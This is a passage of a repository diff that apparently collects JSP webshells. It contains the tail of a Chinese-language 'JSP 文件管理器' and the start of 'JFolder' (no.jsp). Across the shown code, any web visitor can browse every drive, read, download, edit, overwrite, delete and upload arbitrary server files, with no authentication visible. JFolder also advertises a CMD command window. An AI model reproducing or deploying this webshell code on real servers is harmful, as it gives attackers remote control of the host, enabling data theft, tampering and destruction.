line = getLine(is); // 去掉"Content-Type:"行
line = getLine(is); // 去掉空白行
line = getLine(is); // 去掉空白行
line = getLine(is); // 定位
continue;
}
}
boolean skipBlankLine = true;
if (isFile){
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else{
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2)
throw new IllegalArgumentException("出现错误!");
stLine.nextToken();
fileInfo.fileContentType=stLine.nextToken();
}
}
if (skipBlankLine){
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile){
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
//判断是否为目录
if (paramName.equals("dir")){
saveInDir = line;
System.out.println(line);
}
line = getLine(is);
continue;
}
try{
OutputStream os = null;
String path = null;
if (saveFiles)
os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent){
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
break;
}
if (compareBoundary(boundary, currentLine)){
os.write( previousLine, 0, read );
os.flush();
line = new String( currentLine, 0, read3 );
break;
}
else{
os.write( previousLine, 0, read );
os.flush();
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}
}
os.close();
temp = null;
previousLine = null;
currentLine = null;
if (!saveFiles){
ByteArrayOutputStream baos = (ByteArrayOutputStream)os;
fileInfo.setFileContents(baos.toByteArray());
}
else{
fileInfo.file = new File(path);
os = null;
}
dataTable.put(paramName, fileInfo);
}
catch (IOException e) {
throw e;
}
}
return dataTable;
}
// 比较数据
private boolean compareBoundary(String boundary, byte ba[]){
byte b;
if (boundary == null || ba == null) return false;
for (int i=0; i < boundary.length(); i++)
if ((byte)boundary.charAt(i) != ba[i]) return false;
return true;
}
private synchronized String getLine(ServletInputStream sis) throws IOException{
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1){
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index-1);
}
b = null;
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException{
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException("目录或者文件不存在!");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
}
/**
* 下面这个类是为文件和目录排序
* @author bagheera
* @version 1.001
*/
class FileComp implements Comparator{
int mode=1;
/**
* @排序方法 1=文件名, 2=大小, 3=日期
*/
FileComp (int mode){
this.mode=mode;
}
public int compare(Object o1, Object o2){
File f1 = (File)o1;
File f2 = (File)o2;
if (f1.isDirectory()){
if (f2.isDirectory()){
switch(mode){
case 1:return f1.getAbsolutePath().toUpperCase().compareTo(f2.getAbsolutePath().toUpperCase());
case 2:return new Long(f1.length()).compareTo(new Long(f2.length()));
case 3:return new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()));
default:return 1;
}
}
else return -1;
}
else if (f2.isDirectory()) return 1;
else{
switch(mode){
case 1:return f1.getAbsolutePath().toUpperCase().compareTo(f2.getAbsolutePath().toUpperCase());
case 2:return new Long(f1.length()).compareTo(new Long(f2.length()));
case 3:return new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()));
default:return 1;
}
}
}
}
class Writer2Stream extends OutputStream{
Writer out;
Writer2Stream (Writer w){
super();
out=w;
}
public void write(int i) throws IOException{
out.write(i);
}
public void write(byte[] b) throws IOException{
for (int i=0;i<b.length;i++){
int n=b[i];
//Convert byte to ubyte
n=((n>>>4)&0xF)*16+(n&0xF);
out.write (n);
}
}
public void write(byte[] b, int off, int len) throws IOException{
for (int i=off;i<off+len;i++){
int n=b[i];
n=((n>>>4)&0xF)*16+(n&0xF);
out.write (n);
}
}
}
static Vector expandFileList(String[] files, boolean inclDirs){
Vector v = new Vector();
if (files==null) return v;
for (int i=0;i<files.length;i++) v.add (new File(URLDecoder.decode(files[i])));
for (int i=0;i<v.size();i++){
File f = (File) v.get(i);
if (f.isDirectory()){
File[] fs = f.listFiles();
for (int n=0;n<fs.length;n++) v.add(fs[n]);
if (!inclDirs){
v.remove(i);
i--;
}
}
}
return v;
}
static String substr(String s, String search, String replace){
StringBuffer s2 = new StringBuffer ();
int i = 0, j = 0;
int len = search.length();
while ( j > -1 ){
j = s.indexOf( search, i );
if ( j > -1 ){
s2.append( s.substring(i,j) );
s2.append( replace );
i = j + len;
}
}
s2.append( s.substring(i, s.length()) );
return s2.toString();
}
static String getDir (String dir, String name){
if (!dir.endsWith(File.separator)) dir=dir+File.separator;
File mv = new File (name);
String new_dir=null;
if (!mv.isAbsolute()){
new_dir=dir+name;
}
else new_dir=name;
return new_dir;
}
%>
<%
request.setAttribute("dir", request.getParameter("dir"));
String browser_name = request.getRequestURI();
//查看文件
if (request.getParameter("file")!=null){
File f = new File (request.getParameter("file"));
BufferedInputStream reader = new BufferedInputStream(new FileInputStream(f));
int l = f.getName().lastIndexOf(".");
//判断文件后缀
if (l>=0){
String ext = f.getName().substring(l).toLowerCase();
if (ext.equals(".jpg")||ext.equals(".jpeg")||ext.equals(".jpe"))
response.setContentType("image/jpeg");
else if (ext.equals(".gif")) response.setContentType("image/gif");
else if (ext.equals(".pdf")) response.setContentType("application/pdf");
else if (ext.equals(".htm")||ext.equals(".html")||ext.equals(".shtml")) response.setContentType("text/html");
else if (ext.equals(".avi")) response.setContentType("video/x-msvideo");
else if (ext.equals(".mov")||ext.equals(".qt")) response.setContentType("video/quicktime");
else if (ext.equals(".mpg")||ext.equals(".mpeg")||ext.equals(".mpe"))
response.setContentType("video/mpeg");
else if (ext.equals(".zip")) response.setContentType("application/zip");
else if (ext.equals(".tiff")||ext.equals(".tif")) response.setContentType("image/tiff");
else if (ext.equals(".rtf")) response.setContentType("application/rtf");
else if (ext.equals(".mid")||ext.equals(".midi")) response.setContentType("audio/x-midi");
else if (ext.equals(".xl")||ext.equals(".xls")||ext.equals(".xlv")||ext.equals(".xla")
||ext.equals(".xlb")||ext.equals(".xlt")||ext.equals(".xlm")||ext.equals(".xlk"))
response.setContentType("application/excel");
else if (ext.equals(".doc")||ext.equals(".dot")) response.setContentType("application/msword");
else if (ext.equals(".png")) response.setContentType("image/png");
else if (ext.equals(".xml")) response.setContentType("text/xml");
else if (ext.equals(".svg")) response.setContentType("image/svg+xml");
else response.setContentType("text/plain");
}
else response.setContentType("text/plain");
response.setContentLength((int)f.length());
out.clearBuffer();
int i;
while ((i=reader.read())!=-1) out.write(i);
reader.close();
out.flush();
}
//保存所选中文件为zip文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Save as zip"))){
Vector v = expandFileList(request.getParameterValues("selfile"), false);
File dir_file = new File(""+request.getAttribute("dir"));
int dir_l = dir_file.getAbsolutePath().length();
response.setContentType ("application/zip");
response.setHeader ("Content-Disposition", "attachment;filename=\"bagheera.zip\"");
out.clearBuffer();
ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
zipout.setComment("Created by JSP 文件管理器 1.001");
for (int i=0;i<v.size();i++){
File f = (File)v.get(i);
if (f.canRead()){
zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l+1)));
BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
int b;
while ((b=fr.read())!=-1) zipout.write(b);
fr.close();
zipout.closeEntry();
}
}
zipout.finish();
out.flush();
}
//下载文件
else if (request.getParameter("downfile")!=null){
String filePath = request.getParameter("downfile");
File f = new File(filePath);
if (f.exists()&&f.canRead()) {
response.setContentType ("application/octet-stream");
response.setHeader ("Content-Disposition", "attachment;filename=\""+f.getName()+"\"");
response.setContentLength((int) f.length());
BufferedInputStream fileInputStream = new BufferedInputStream(new FileInputStream(f));
int i;
out.clearBuffer();
while ((i=fileInputStream.read()) != -1) out.write(i);
fileInputStream.close();
out.flush();
}
else {
out.println("<html><body><h1>文件"+f.getAbsolutePath()+
"不存在或者无读权限</h1></body></html>");
}
}
else{
if (request.getAttribute("dir")==null){
request.setAttribute ("dir", application.getRealPath("."));
}
%>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<style type="text/css">
.login { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666; width:320px; }
.header { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 10pt; color: #666666; font-weight: bold; }
.tableHeader { background-color: #c0c0c0; color: #666666;}
.tableHeaderLight { background-color: #cccccc; color: #666666;}
.main { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
.copy { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #999999;}
.copy:Hover { color: #666666; text-decoration : underline; }
.button {background-color: #c0c0c0; color: #666666;
border-left: 1px solid #999999; border-right: 1px solid #999999;
border-top: 1px solid #999999; border-bottom: 1px solid #999999}
.button:Hover { color: #444444 }
td { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
A { text-decoration: none; }
A:Hover { color : Red; text-decoration : underline; }
BODY { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
</style>
<script type="text/javascript">
<!--
var check = false;
function dis(){
check = true;
}
var DOM = 0, MS = 0, OP = 0;
function CheckBrowser() {
if (window.opera) OP = 1;
if(document.getElementById) {
DOM = 1;
}
if(document.all && !OP) {
MS = 1;
}
}
function selrow (element, i){
CheckBrowser();
var erst;
if ((OP==1)||(MS == 1)) erst = element.firstChild.firstChild;
else if (DOM == 1) erst = element.firstChild.nextSibling.firstChild;
//MouseIn
if (i == 0)
if (erst.checked == true) element.style.backgroundColor = '#dddddd';
else element.style.backgroundColor = '#eeeeee';
//MouseOut
else if (i == 1){
if (erst.checked == true) element.style.backgroundColor = '#dddddd';
else element.style.backgroundColor = '#ffffff';
}
//MouseClick
else if ((i == 2)&&(!check)){
if (erst.checked == true) element.style.backgroundColor = '#eeeeee';
else element.style.backgroundColor = '#dddddd';
erst.click();
}
else check = false;
}
//-->
</script>
<%
}
//上传
if ((request.getContentType()!=null)&&(request.getContentType().toLowerCase().startsWith("multipart"))){
response.setContentType("text/html");
HttpMultiPartParser parser = new HttpMultiPartParser();
boolean error = false;
try{
Hashtable ht = parser.processData(request.getInputStream(), "-", tempdir);
if (ht.get("myFile")!=null){
FileInfo fi = (FileInfo)ht.get("myFile");
File f = fi.file;
//把文件从缓冲目录里复制出来
String path = (String)ht.get("dir");
if (!path.endsWith(File.separator)) path = path+File.separator;
if (!f.renameTo(new File(path+f.getName()))){
request.setAttribute("message", "无法上传文件.");
error = true;
f.delete();
}
}
else{
request.setAttribute("message", "请选中上传文件!");
error = true;
}
request.setAttribute("dir", (String)ht.get("dir"));
}
catch (Exception e){
request.setAttribute("message", "发生如下错误:"+e+". 上传失败!");
error = true;
}
if (!error) request.setAttribute("message", "文件上传成功.");
}
else if (request.getParameter("editfile")!=null){
%>
<title>JSP文件管理器-编辑文件:<%=request.getParameter("editfile")%></title>
</head>
<body>
<%
String encoding="gb2312";
request.setAttribute("dir", null);
File ef = new File(request.getParameter("editfile"));
BufferedReader reader = new BufferedReader(new FileReader(ef));
String disable = "";
if (!ef.canWrite()) disable = "无法打开文件";
out.print("<form action=\""+browser_name+"\" method=\"Post\">\n"+
"<textarea name=\"text\" wrap=\"off\" cols=\""+
EDITFIELD_COLS+"\" rows=\""+EDITFIELD_ROWS+"\""+">"+disable);
String c;
while ((c =reader.readLine())!=null){
c=substr(c,"&", "&amp;");
c=substr(c,"<", "&lt;");
c=substr(c,">", "&gt;");
c=substr(c,"\"", "&quot;");
out.print(c+"\n");
}
reader.close();
%></textarea>
<input type="hidden" name="nfile" value="<%= request.getParameter("editfile")%>">
<table><tr>
<td title="Enter the new filename"><input type="text" name="new_name" value="<%=ef.getName()%>"></td>
<td><input type="Submit" name="Submit" value="保存"></td>
<td><input type="Submit" name="Submit" value="取消"></td></tr>
<tr><td><input type="checkbox" name="Backup" checked>覆写</td></tr>
</table>
</form>
</body>
</html>
<%
}
//保存文件
else if (request.getParameter("nfile")!=null){
File f = new File(request.getParameter("nfile"));
File new_f = new File(getDir(f.getParent(), request.getParameter("new_name")));
if (request.getParameter("Submit").equals("Save")){
if (new_f.exists()&&request.getParameter("Backup")!=null){
File bak = new File(new_f.getAbsolutePath()+".bak");
bak.delete();
new_f.renameTo(bak);
}
BufferedWriter outs = new BufferedWriter(new FileWriter(new_f));
outs.write(request.getParameter("text"));
outs.flush();
outs.close();
}
request.setAttribute("dir", f.getParent());
}
//删除文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Delete Files"))){
Vector v = expandFileList(request.getParameterValues("selfile"), true);
boolean error = false;
for (int i=v.size()-1;i>=0;i--){
File f = (File)v.get(i);
if (!f.canWrite()||!f.delete()){
request.setAttribute("message", "无法删除文件"+f.getAbsolutePath()+". 删除失败");
error = true;
break;
}
}
if ((!error)&&(v.size()>1)) request.setAttribute("message", "All files deleted");
else if ((!error)&&(v.size()>0)) request.setAttribute("message", "File deleted");
else if (!error) request.setAttribute("message", "No files selected");
}
//建新目录
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Create Dir"))){
String dir = ""+request.getAttribute("dir");
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir (dir, dir_name);
if (new File(new_dir).mkdirs()){
request.setAttribute("message", "目录创建完成");
}
else request.setAttribute("message", "创建新目录"+new_dir+"失败");
}
//创建文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Create File"))){
String dir = ""+request.getAttribute("dir");
String file_name = request.getParameter("cr_dir");
String new_file = getDir (dir, file_name);
//Test, if file_name is empty
if ((file_name.trim()!="")&&!file_name.endsWith(File.separator)){
if (new File(new_file).createNewFile()) request.setAttribute("message", "文件成功创建");
else request.setAttribute("message", "创建文件"+new_file+"失败");
}
else request.setAttribute("message", "错误: "+file_name+"文件不存在");
}
//转移文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Move Files"))){
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = ""+request.getAttribute("dir");
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
boolean error = false;
if (!new_dir.endsWith(File.separator)) new_dir+=File.separator;
for (int i=v.size()-1;i>=0;i--){
File f = (File)v.get(i);
if (!f.canWrite()||!f.renameTo(new File(new_dir+f.getAbsolutePath().substring(dir.length())))){
request.setAttribute("message", "不能转移"+f.getAbsolutePath()+".转移失败");
error = true;
break;
}
}
if ((!error)&&(v.size()>1)) request.setAttribute("message", "全部文件转移成功");
else if ((!error)&&(v.size()>0)) request.setAttribute("message", "文件转移成功");
else if (!error) request.setAttribute("message", "请选择文件");
}
//复制文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Copy Files"))){
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = (String)request.getAttribute("dir");
if (!dir.endsWith(File.separator)) dir+=File.separator;
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
boolean error = false;
if (!new_dir.endsWith(File.separator)) new_dir+=File.separator;
byte buffer[] = new byte[0xffff];
try{
for (int i=0;i<v.size();i++){
File f_old = (File)v.get(i);
File f_new = new File(new_dir+f_old.getAbsolutePath().substring(dir.length()));
if (f_old.isDirectory()) f_new.mkdirs();
else if (!f_new.exists()){
InputStream fis = new FileInputStream (f_old);
OutputStream fos = new FileOutputStream (f_new);
int b;
while((b=fis.read(buffer))!=-1) fos.write(buffer, 0, b);
fis.close();
fos.close();
}
else{
//文件存在
request.setAttribute("message", "无法复制"+f_old.getAbsolutePath()+",文件已经存在,复制失败");
error = true;
break;
}
}
}
catch (IOException e){
request.setAttribute("message", "错误"+e+".复制取消");
error = true;
}
if ((!error)&&(v.size()>1)) request.setAttribute("message", "全部文件复制成功");
else if ((!error)&&(v.size()>0)) request.setAttribute("message", "文件复制成功");
else if (!error) request.setAttribute("message", "请选择文件");
}
//目录浏览
if ((request.getAttribute("dir")!=null)){
%>
<title>JSP文件管理器-目录浏览:<%=request.getAttribute("dir")%></title>
</head>
<body>
<table>
<tr><td>
<% if (request.getAttribute("message")!=null){
out.println("<table border=\"0\" width=\"100%\"><tr><td bgcolor=\"#FFFF00\" align=\"center\">");
out.println(request.getAttribute("message"));
out.println("</td></tr></table>");
}
%>
<form action="<%= browser_name %>" method="Post">
<table border="1" cellpadding="1" cellspacing="0" width="100%">
<%
String dir = URLEncoder.encode(""+request.getAttribute("dir"));
String cmd = browser_name+"?dir="+dir;
out.println("<th bgcolor=\"#c0c0c0\"></th><th title=\"按文件名称排序\" bgcolor=\"#c0c0c0\"><a href=\""+cmd+"&sort=1\">文件名</a></th>"+
"<th title=\"按大小称排序\" bgcolor=\"#c0c0c0\"><a href=\""+cmd+"&sort=2\">大小</th>"+
"<th title=\"按日期称排序\" bgcolor=\"#c0c0c0\"><a href=\""+cmd+"&sort=3\">日期</th>"+
"<th bgcolor=\"#c0c0c0\">&nbsp;</th><th bgcolor=\"#c0c0c0\">&nbsp;</th>");
char trenner=File.separatorChar;
File f=new File(""+request.getAttribute("dir"));
//跟或者分区
File[] entry=File.listRoots();
for (int i=0;i<entry.length;i++){
out.println("<tr bgcolor='#ffffff'\">");
out.println("<td>※切换到相应盘符:<span style=\"background-color: rgb(255,255,255);color:rgb(255,0,0)\">");
String name = URLEncoder.encode(entry[i].getAbsolutePath());
String buf = entry[i].getAbsolutePath();
out.println("◎<a href=\""+browser_name+"?dir="+name+"\">["+buf+"]</a>");
out.println("</td></tr>");
}
out.println("<br>");
//..
if (f.getParent()!=null){
out.println("<tr bgcolor='#ffffff' onmouseover=\"this.style.backgroundColor = '#eeeeee'\" onmouseout=\"this.style.backgroundColor = '#ffffff'\">");
out.println("<td></td><td>");
out.println("<a href=\""+browser_name+"?dir="+URLEncoder.encode(f.getParent())+"\">[..]</a>");
out.println("</td></tr>");
}
//文件和目录
entry=f.listFiles();
if (entry!=null&&entry.length>0){
int mode=1;
if (request.getParameter("sort")!=null) mode = Integer.parseInt(request.getParameter("sort"));
Arrays.sort(entry, new FileComp(mode));
String ahref = "<a onmousedown=\"javascript:dis();\" href=\"";
for (int i=0;i<entry.length;i++){
String name = URLEncoder.encode(entry[i].getAbsolutePath());
String link;
String dlink = "&nbsp;";
String elink = "&nbsp;";
String buf = entry[i].getName();
if (entry[i].isDirectory()){
if (entry[i].canRead())
link = ahref+browser_name+"?dir="+name+"\">["+buf+"]</a>";
else
link = "["+buf+"]";
}
else{
if (entry[i].canRead()){
if (entry[i].canWrite()){
link=ahref+browser_name+"?file="+name+"\">"+buf+"</a>";
dlink=ahref+browser_name+"?downfile="+name+"\">下载</a>";
elink=ahref+browser_name+"?editfile="+name+"\">编辑</a>";
}
else{
link=ahref+browser_name+"?file="+name+"\"><i>"+buf+"</i></a>";
dlink=ahref+browser_name+"?downfile="+name+"\">下载</a>";
elink=ahref+browser_name+"?editfile="+name+"\">查看</a>";
}
}
else{
link = buf;
}
}
String date = DateFormat.getDateTimeInstance().format(new Date(entry[i].lastModified()));
out.println("<tr bgcolor='#ffffff' onmouseup = \"javascript:selrow(this, 2);\" "+
"onmouseover=\"javascript:selrow(this, 0);\" onmouseout=\"javascript:selrow(this, 1);\">");
out.println("<td><input type=\"checkbox\" name=\"selfile\" value=\""+name+"\" onmousedown=\"javascript:dis();\"></td>");
out.println("<td>"+link+"</td><td align=\"right\">"+entry[i].length()+
" bytes</td><td align=\"right\">"+
date+"</td><td>"
+dlink+"</td><td>"+elink+"</td></tr>");
}
}
%>
</table>
<table>
<input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<tr>
<td title="把所选文件打包下载"><input class="button" type="Submit" name="Submit" value="Save as zip"></td>
<td colspan="2" title="删除所选文件和文件夹"><input class="button" type="Submit" name="Submit" value="Delete Files"></td></tr>
<tr>
<td><input type="text" name="cr_dir"></td>
<td><input class="button" type="Submit" name="Submit" value="Create Dir"></td>
<td><input class="button" type="Submit" name="Submit" value="Create File"></td>
<td><input class="button" type="Submit" name="Submit" value="Move Files"></td>
<td><input class="button" type="Submit" name="Submit" value="Copy Files"></td></tr>
</table>
</form>
<form action="<%= browser_name %>" enctype="multipart/form-data" method="POST">
<table cellpadding="0">
<tr>
<td><input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<input type="file" name="myFile"></td>
<td><input type="Submit" class="button" name="Submit" value="Upload"></td>
</tr>
</table>
</form>
<hr>
<center><small>JSP 文件管理器 v1.001 By Bagheera<a href="http://jmmm.com">http://jmmm.com</a>
</small></center>
</td></tr></table>
</body>
</html>
<%
}
%>

2317
jsp/hackk8/fuck-jsp/ma3.jsp Normal file

File diff suppressed because it is too large Load diff

1780
jsp/hackk8/fuck-jsp/ma4.jsp Normal file

File diff suppressed because it is too large Load diff

995
jsp/hackk8/fuck-jsp/no.jsp Normal file

@ -0,0 +1,995 @@
<%
/**
JFolder V0.9 windows platform
@Filename JFolder.jsp
@Description 一个简单的系统文件目录显示程序,类似于资源管理器,提供基本的文件操作,不过功能弱多了。
@Author Steven Cee
@Email cqq1978@Gmail.com
@Bugs : 下载时,中文文件名无法正常显示
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //语言版本0 : 中文; 1英文
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> 写的不好,将就着用吧 - - by 慈勤强 http://www.topronet.com </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
String[] strFileManage = {"文 件 管 理","File Management"};
String[] strCommand = {"CMD 命 令","Command Window"};
String[] strSysProperty = {"系 统 属 性","System Property"};
String[] strHelp = {"帮 助","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers = {"驱动器","Drivers"};
String[] strFileName = {"文件名称","File Name"};
String[] strFileSize = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit = {"修改","Edit"};
String[] strFileDown = {"下载","Download"};
String[] strFileCopy = {"复制","Move"};
String[] strFileDel = {"删除","Delete"};
String[] strExecute = {"执行","Execute"};
String[] strBack = {"返回","Back"};
String[] strFileSave = {"保存","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
